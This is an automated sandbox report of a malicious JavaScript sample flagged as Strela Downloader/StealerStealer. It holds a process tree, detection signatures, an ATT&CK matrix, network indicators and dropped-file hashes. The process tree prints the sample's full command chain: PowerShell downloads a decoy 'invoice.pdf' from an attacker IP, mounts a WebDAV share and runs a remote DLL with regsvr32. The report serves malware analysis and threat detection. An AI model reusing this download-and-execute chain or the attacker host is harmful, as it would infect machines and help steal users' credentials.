Windows
Analysis Report
7772104212868830459.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 8188 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\77721 0421286883 0459.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7408 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\534 1240741933 2.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7540 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6260 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7188 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6116 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 80 --field -trial-han dle=1560,i ,895427224 8294009097 ,106848914 7556843623 9,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1704 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588363 |
Start date and time: | 2025-01-11 01:22:20 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 0s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 7772104212868830459.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 217.20.57.41, 2.16.168.105, 2.16.168.107, 23.200.0.173, 23.200.0.196, 192.168.2.10, 13.107.246.45, 3.233.129.217, 172.202.163.200, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
19:23:16 | API Interceptor | |
19:23:20 | API Interceptor | |
19:23:21 | API Interceptor | |
19:23:29 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8807433781583276 |
Encrypted: | false |
SSDEEP: | 1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9z:0J7adfWuK0p/QDfKoPeuP0aN4fqoxc |
MD5: | 2AEFEB265BC498DFB607150412580E92 |
SHA1: | BA1464D364204B4C4E90B5B9CE1FD6023BBB4F72 |
SHA-256: | 1DEC3DEB5F6D9A5226BF49D49DFFBE5F7FC6C860D8BE68205C60E4279540A355 |
SHA-512: | 8EB904B506369EE270C7DDEE55C99E98798702E3F56E22C68C10098A869BD8D91108523DDD8A476D2CBDAFADDB37CEE53E001E6FE39E540069F35FC96ABB3A54 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7879891248965444 |
Encrypted: | false |
SSDEEP: | 1536:vSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:vazaPv4V4fXq2UaB |
MD5: | 653DF41E997DB4AFD9167BC5A0A5E9C3 |
SHA1: | 4CA9E218F615948CC965D17A5C200FA9B85F9A60 |
SHA-256: | 137E36B1DB01AEA5418ABCBADEEF95F766F37A637ECB7CD8E6C1D9F6D3FAC224 |
SHA-512: | E2DBE255F97912BAF154A0AA47FBCA0D631939B1CEED513604B9AC9D5C72C41BAB21686A8B1F6EEA7F822E146FAB0932FA6831CAEBC0EC3CFCE98F54E56BC85A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.080020398869644 |
Encrypted: | false |
SSDEEP: | 3:QTtEYeH2dj1+gv1XlVG0+q2Iqe8luw2ukxjl1ollNTt/4ll/Q6beV/:QT6zHqGE8luUtHtc6V |
MD5: | 8E067668E1B2048293244C5A848B984C |
SHA1: | AC549FC4A76FAA89483B803688ED8842108FDF23 |
SHA-256: | 6DB384B77100B59593DE052221DF75EFDFDB31C9F3A415D0F859D7758C531AB2 |
SHA-512: | 6B4183CA2AA04E5D17DF28E30503655FBB504BD12A5CE5AC7635FF1D167452F498FCE90D130C473AE9204D70A99F3F932B7506018F28C19177C53C268708F744 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
